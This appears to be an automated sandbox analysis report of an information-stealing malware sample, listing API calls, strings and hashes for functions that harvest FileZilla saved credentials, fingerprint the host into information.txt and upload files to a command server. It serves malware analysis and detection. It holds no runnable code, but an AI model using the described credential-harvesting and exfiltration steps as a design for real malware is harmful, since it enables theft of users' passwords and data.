Instruction Fuzzy Hash: 51D17AB190021AEBDB10DBE4DC95EFFB77CEB48708F50459AF615A3280D6785E488B74

Uniqueness

Uniqueness Score: -1.00%

Function 00404DD0 Relevance: 74.3, APIs: 26, Strings: 16, Instructions: 810
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E56

Part of subcall function 004117A0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 004117C4
Part of subcall function 004117A0: GetProcessHeap.KERNEL32(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117D3
Part of subcall function 004117A0: RtlAllocateHeap.NTDLL(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117DA

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

StrCmpCA.SHLWAPI(?,0145F7A0,004278A7,004278A3,0042789B,00427897,00427896), ref: 00404EE1
InternetOpenA.WININET(00000000,00000001,?,?,?), ref: 00404F07
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405031
HttpOpenRequestA.WININET(00000000,0145F8C0,?,01462F48,00000000,00000000,-00400100,00000000), ref: 00405072
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405098

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,014622F8,00000000,?,00427960,00000000,?,?), ref: 00405590
lstrlen.KERNEL32(00000000), ref: 004055A2
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004055B5
HeapAlloc.KERNEL32(00000000), ref: 004055BC
lstrlen.KERNEL32(00000000), ref: 004055CE
memcpy.MSVCRT ref: 004055E2
lstrlen.KERNEL32(00000000,?,?), ref: 004055FB
memcpy.MSVCRT ref: 00405605
lstrlen.KERNEL32(00000000), ref: 00405616
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040562F
memcpy.MSVCRT ref: 0040563C
lstrlen.KERNEL32(00000000,?,00000000), ref: 00405652
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405663
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040568B
InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 004056D4
InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 0040572B
StrCmpCA.SHLWAPI(00000000,block), ref: 00405743
ExitProcess.KERNEL32 ref: 0040574E
InternetCloseHandle.WININET(00000000), ref: 0040575F

Strings

------, xrefs: 00405348
------, xrefs: 00404F60
--, xrefs: 00404F87
------, xrefs: 00405491
------, xrefs: 0040509E
", xrefs: 0040516D
file_data, xrefs: 00405535
", xrefs: 0040555E
------, xrefs: 004051E7
build_id, xrefs: 0040528C
ERROR, xrefs: 00405832
block, xrefs: 00405735
", xrefs: 00405417
ERROR, xrefs: 00405698
", xrefs: 004052B5
0, xrefs: 00405706

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$FileOpenReadRequestlstrcat$AllocAllocateBinaryCloseConnectCrackCryptExitHandleInfoOptionQuerySendString
String ID: ------$"$"$"$"$--$------$------$------$------$0$ERROR$ERROR$block$build_id$file_data
API String ID: 1135472144-3618031631
Opcode ID: e815b3ad2264143bb48ae0f0fc906797d55cb53abbd96dc878e8bdd3ba56be44
Instruction ID: db5541188cdc9f639a804d86c40747d3c4d91d865bd81aad25c9fe7a46c42329
Opcode Fuzzy Hash: e815b3ad2264143bb48ae0f0fc906797d55cb53abbd96dc878e8bdd3ba56be44
Instruction Fuzzy Hash: 20624471800249EADB15EBE5C951BEEBBB8AF19304F5041AEF50173182DE786B4CCB79

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9F0 Relevance: 73.9, APIs: 31, Strings: 11, Instructions: 401
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00406E40: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,?,0040CABD,?,00000000,?,00000000,00000000), ref: 00406E77
Part of subcall function 00406E40: GetFileSizeEx.KERNEL32(00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406E8D
Part of subcall function 00406E40: LocalAlloc.KERNEL32(00000040,?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EA8
Part of subcall function 00406E40: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EC1
Part of subcall function 00406E40: CloseHandle.KERNEL32(00000000,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE9

Part of subcall function 00411750: LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C

strtok_s.MSVCRT ref: 0040CAE9
GetProcessHeap.KERNEL32(00000000,000F423F,00427B47,00427B46,00427B43,00427B42), ref: 0040CB3F
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CB46
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040CB66
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CB71

Part of subcall function 00411BD0: malloc.MSVCRT ref: 00411BE1
Part of subcall function 00411BD0: strncpy.MSVCRT ref: 00411BF1

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040CBA8
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CBB3
StrStrA.SHLWAPI(00000000,<User>), ref: 0040CBF0
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CBFB
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040CC38
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CC47
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CCD3
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CCEB
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CD03
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CD1B
lstrcat.KERNEL32(?,Soft: FileZilla), ref: 0040CD33
lstrcat.KERNEL32(?,Host: ), ref: 0040CD42
lstrcat.KERNEL32(?,00000000), ref: 0040CD55
lstrcat.KERNEL32(?,00427F1C), ref: 0040CD64
lstrcat.KERNEL32(?,00000000), ref: 0040CD77
lstrcat.KERNEL32(?,00427F20), ref: 0040CD86
lstrcat.KERNEL32(?,Login: ), ref: 0040CD95
lstrcat.KERNEL32(?,00000000), ref: 0040CDA8
lstrcat.KERNEL32(?,00427F2C), ref: 0040CDB7
lstrcat.KERNEL32(?,Password: ), ref: 0040CDC6
lstrcat.KERNEL32(?,00000000), ref: 0040CDD9
lstrcat.KERNEL32(?,00427F3C), ref: 0040CDE8
lstrcat.KERNEL32(?,00427F40), ref: 0040CDF7

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

strtok_s.MSVCRT ref: 0040CE3B
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CE51
memset.MSVCRT ref: 0040CEA5

Strings

Host: , xrefs: 0040CD3C
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040CA75
<Pass encoding="base64">, xrefs: 0040CC32
Login: , xrefs: 0040CD8F
<User>, xrefs: 0040CBEA
Soft: FileZilla, xrefs: 0040CD2D
<Port>, xrefs: 0040CBA2
Password: , xrefs: 0040CDC0
<Host>, xrefs: 0040CB60
O{BN{BK{B, xrefs: 0040CE1C
passwords.txt, xrefs: 0040CE64

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $O{BN{BK{B$Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 433178851-1966776650
Opcode ID: f405c95e2274f6d26f8ca5c4a1d56def5a07e81201ba6dc32980dd9eb2c7a1c6
Instruction ID: d3b6116b1b73df3cabd5054aa1a62d8a43f82c6421f78d5ef7e496df56dda141
Opcode Fuzzy Hash: f405c95e2274f6d26f8ca5c4a1d56def5a07e81201ba6dc32980dd9eb2c7a1c6
Instruction Fuzzy Hash: 3CE1A175904219EACB04EBA0DC56BEEBB78AF19304F50056EF901731C2DF786A48C769

Uniqueness

Uniqueness Score: -1.00%

Function 00405C90 Relevance: 54.9, APIs: 21, Strings: 10, Instructions: 684
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405D5A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405F04
HttpOpenRequestA.WININET(00000000,0145F8C0,?,01462F48,00000000,00000000,-00400100,00000000), ref: 00405F44
lstrlen.KERNEL32(00000000,00000000,004205B9,?,00000000,004205B9,",00000000,004205B9,mode,00000000,004205B9,014622F8,00000000,004205B9,004279E8), ref: 00406342
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406353
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040635E
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406365
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406376
memcpy.MSVCRT ref: 00406387
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406398
lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004063B1
memcpy.MSVCRT ref: 004063BA
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004063CD
HttpSendRequestA.WININET(?,00000000,00000000), ref: 004063E1
InternetReadFile.WININET(?,?,000000C7,00000000), ref: 004063F8
InternetReadFile.WININET(?,00000000,000000C7,00000000), ref: 0040644E
InternetCloseHandle.WININET(?), ref: 00406459
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405F6B

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

InternetCloseHandle.WININET(00000000), ref: 00406466
InternetCloseHandle.WININET(00000000), ref: 00406470
StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,00000000), ref: 00405D7A

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Strings

mode, xrefs: 004062BF
------, xrefs: 0040621A
*, xrefs: 00406525
------, xrefs: 00405DFF
", xrefs: 00406040
", xrefs: 004062E8
------, xrefs: 004060BA
", xrefs: 00406187
------, xrefs: 00405F71
build_id, xrefs: 0040615E

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocConnectCrackOptionProcessSend
String ID: "$"$"$*$------$------$------$------$build_id$mode
API String ID: 530647464-3630346487
Opcode ID: 295d76698cad3f0070742d993786b5cfb92bdf050978c5db47067aa722c3827c
Instruction ID: 80b1796918ec1c29b6be473428c1b8ad95fa748133d466919d2d563d3e35a917
Opcode Fuzzy Hash: 295d76698cad3f0070742d993786b5cfb92bdf050978c5db47067aa722c3827c
Instruction Fuzzy Hash: 1A526271801249EADB15E7E5C952BEEBBB89F19304F2440AEF50173182DE786B4CCB79

Uniqueness

Uniqueness Score: -1.00%

Function 004158F0 Relevance: 50.0, APIs: 2, Strings: 26, Instructions: 1038
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 00410300: GetProcessHeap.KERNEL32(00000000,00000104,?,004283B0,00000000,?,00000000,00000000), ref: 0041030E
Part of subcall function 00410300: HeapAlloc.KERNEL32(00000000,?,004283B0,00000000,?,00000000,00000000), ref: 00410315
Part of subcall function 00410300: GetLocalTime.KERNEL32(004283B0,?,004283B0,00000000,?,00000000,00000000), ref: 00410321
Part of subcall function 00410300: wsprintfA.USER32 ref: 0041034D

Part of subcall function 00410C90: memset.MSVCRT ref: 00410CB5
Part of subcall function 00410C90: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410CD2
Part of subcall function 00410C90: RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410CF4
Part of subcall function 00410C90: CharToOemA.USER32(00000000,?), ref: 00410D12

Part of subcall function 00410D30: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410D45

Part of subcall function 00410D90: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410DC8
Part of subcall function 00410D90: GetVolumeInformationA.KERNEL32(00421EB9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410E01
Part of subcall function 00410D90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410E4D
Part of subcall function 00410D90: HeapAlloc.KERNEL32(00000000), ref: 00410E54

GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,004283E8,00000000,?,00000000,00000000,00000000,00000000), ref: 00415C2B

Part of subcall function 00411A40: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411A5C
Part of subcall function 00411A40: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411A77
Part of subcall function 00411A40: CloseHandle.KERNEL32(00000000), ref: 00411A7E

Part of subcall function 00410F40: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410F55
Part of subcall function 00410F40: HeapAlloc.KERNEL32(00000000), ref: 00410F5C

Part of subcall function 004110A0: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?,004283F4,00000000), ref: 004110C3
Part of subcall function 004110A0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C), ref: 004110D4
Part of subcall function 004110A0: CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000), ref: 004110EE
Part of subcall function 004110A0: CoSetProxyBlanket.OLE32(004283F4,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000), ref: 00411127
Part of subcall function 004110A0: VariantInit.OLEAUT32(?), ref: 00411186

Part of subcall function 00411260: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 00411283
Part of subcall function 00411260: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430), ref: 00411294
Part of subcall function 00411260: CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 004112AE
Part of subcall function 00411260: CoSetProxyBlanket.OLE32(00428430,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000), ref: 004112E7
Part of subcall function 00411260: VariantInit.OLEAUT32(?), ref: 00411342

Part of subcall function 004102C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,014532B8,0041887F), ref: 004102CC
Part of subcall function 004102C0: HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,014532B8,0041887F), ref: 004102D3
Part of subcall function 004102C0: GetComputerNameA.KERNEL32(00000000,0041887F), ref: 004102E7

Part of subcall function 00410280: GetProcessHeap.KERNEL32(00000000,00000104,?,014532E8,?,00401074,014532E8,?,0041887F), ref: 0041028C
Part of subcall function 00410280: HeapAlloc.KERNEL32(00000000,?,014532E8,?,00401074,014532E8,?,0041887F), ref: 00410293
Part of subcall function 00410280: GetUserNameA.ADVAPI32(00000000,014532E8), ref: 004102A7

Part of subcall function 00410C10: CreateDCA.GDI32(014532F8,00000000,00000000,00000000), ref: 00410C2A
Part of subcall function 00410C10: GetDeviceCaps.GDI32(00000000,00000008), ref: 00410C35
Part of subcall function 00410C10: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410C40
Part of subcall function 00410C10: ReleaseDC.USER32(00000000,00000000), ref: 00410C4B
Part of subcall function 00410C10: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415FBA,?,00000000,?,Display Resolution: ,00000000,?,00428460,00000000), ref: 00410C58
Part of subcall function 00410C10: HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415FBA,?,00000000,?,Display Resolution: ,00000000,?,00428460,00000000,?), ref: 00410C5F
Part of subcall function 00410C10: wsprintfA.USER32 ref: 00410C6F

Part of subcall function 004103D0: GetKeyboardLayoutList.USER32(00000000,00000000,004280A7,?,?,00000001), ref: 00410417
Part of subcall function 004103D0: LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 00410429
Part of subcall function 004103D0: GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 00410434
Part of subcall function 004103D0: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410466
Part of subcall function 004103D0: LocalFree.KERNEL32(?,?,?,00000001), ref: 0041050A

Part of subcall function 00410360: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410371
Part of subcall function 00410360: HeapAlloc.KERNEL32(00000000), ref: 00410378
Part of subcall function 00410360: GetTimeZoneInformation.KERNEL32(?), ref: 00410387
Part of subcall function 00410360: wsprintfA.USER32 ref: 004103B2

Part of subcall function 00410530: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410545
Part of subcall function 00410530: HeapAlloc.KERNEL32(00000000), ref: 0041054C
Part of subcall function 00410530: RegOpenKeyExA.KERNEL32(80000002,0145A738,00000000,00020119,00000000), ref: 0041056B
Part of subcall function 00410530: RegQueryValueExA.KERNEL32(00000000,014617D8,00000000,00000000,00000000,000000FF), ref: 00410586

Part of subcall function 004105E0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410602
Part of subcall function 004105E0: GetLastError.KERNEL32(?,?,00000001), ref: 00410610
Part of subcall function 004105E0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410648
Part of subcall function 004105E0: wsprintfA.USER32 ref: 00410692

Part of subcall function 004105A0: GetSystemInfo.KERNEL32(00000000), ref: 004105AD
Part of subcall function 004105A0: wsprintfA.USER32 ref: 004105C3

Part of subcall function 004106E0: GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498), ref: 004106EE
Part of subcall function 004106E0: HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498,00000000), ref: 004106F5
Part of subcall function 004106E0: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 00410715
Part of subcall function 004106E0: wsprintfA.USER32 ref: 0041073B

Part of subcall function 00410750: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004107A7
Part of subcall function 00410750: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 00410834

Part of subcall function 00410B00: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410B4F
Part of subcall function 00410B00: Process32First.KERNEL32(00000000,00000128), ref: 00410B5F
Part of subcall function 00410B00: Process32Next.KERNEL32(00000000,00000128), ref: 00410B71
Part of subcall function 00410B00: Process32Next.KERNEL32(00000000,00000128), ref: 00410BDE
Part of subcall function 00410B00: CloseHandle.KERNEL32(00000000), ref: 00410BE9

Part of subcall function 00410860: RegOpenKeyExA.KERNEL32(00000000,01456570,00000000,00020019,00000000,004280BF,?,00000001), ref: 004108BF

Part of subcall function 00410860: RegEnumKeyExA.KERNEL32(00000000,?,?,00428524,00000000,00000000,00000000,00000000,?,?,00000001), ref: 0041091E
Part of subcall function 00410860: wsprintfA.USER32 ref: 00410947
Part of subcall function 00410860: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 00410965
Part of subcall function 00410860: RegQueryValueExA.KERNEL32(?,01461DB8,00000000,000F003F,?,00000400), ref: 00410995
Part of subcall function 00410860: lstrlen.KERNEL32(?), ref: 004109AA
Part of subcall function 00410860: RegQueryValueExA.KERNEL32(?,01461DD0,00000000,000F003F,?,00000400,00000000,00421E41,?,00000000,?,004280F0), ref: 00410A2E

lstrlen.KERNEL32(00000000,00000000,?,00428534,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00416697

Part of subcall function 00415650: Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
Part of subcall function 00415650: CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
Part of subcall function 00415650: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743

Strings

Windows: , xrefs: 00415CEE
VideoCard: , xrefs: 0041640D
Work Dir: In memory, xrefs: 00415C9C
Date: , xrefs: 004159E4
Keyboard Languages: , xrefs: 0041601B
[Hardware], xrefs: 004161CA
[Software], xrefs: 00416592
Version: , xrefs: 00415923
AV: , xrefs: 00415DFD
User Name: , xrefs: 00415F0C
HWID: , xrefs: 00415B6F
Local Time: , xrefs: 004160BA
Computer Name: , xrefs: 00415E90
TimeZone: , xrefs: 0041613C
Cores: , xrefs: 00416287
Display Resolution: , xrefs: 00415F88
Processor: , xrefs: 004161F9
information.txt, xrefs: 004166B2
MachineID: , xrefs: 00415A60
Install Date: , xrefs: 00415D6A
[Processes], xrefs: 004164E7
W, xrefs: 00416718
RAM: , xrefs: 0041638B
GUID: , xrefs: 00415ADC
Threads: , xrefs: 00416309
Path: , xrefs: 00415C02

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
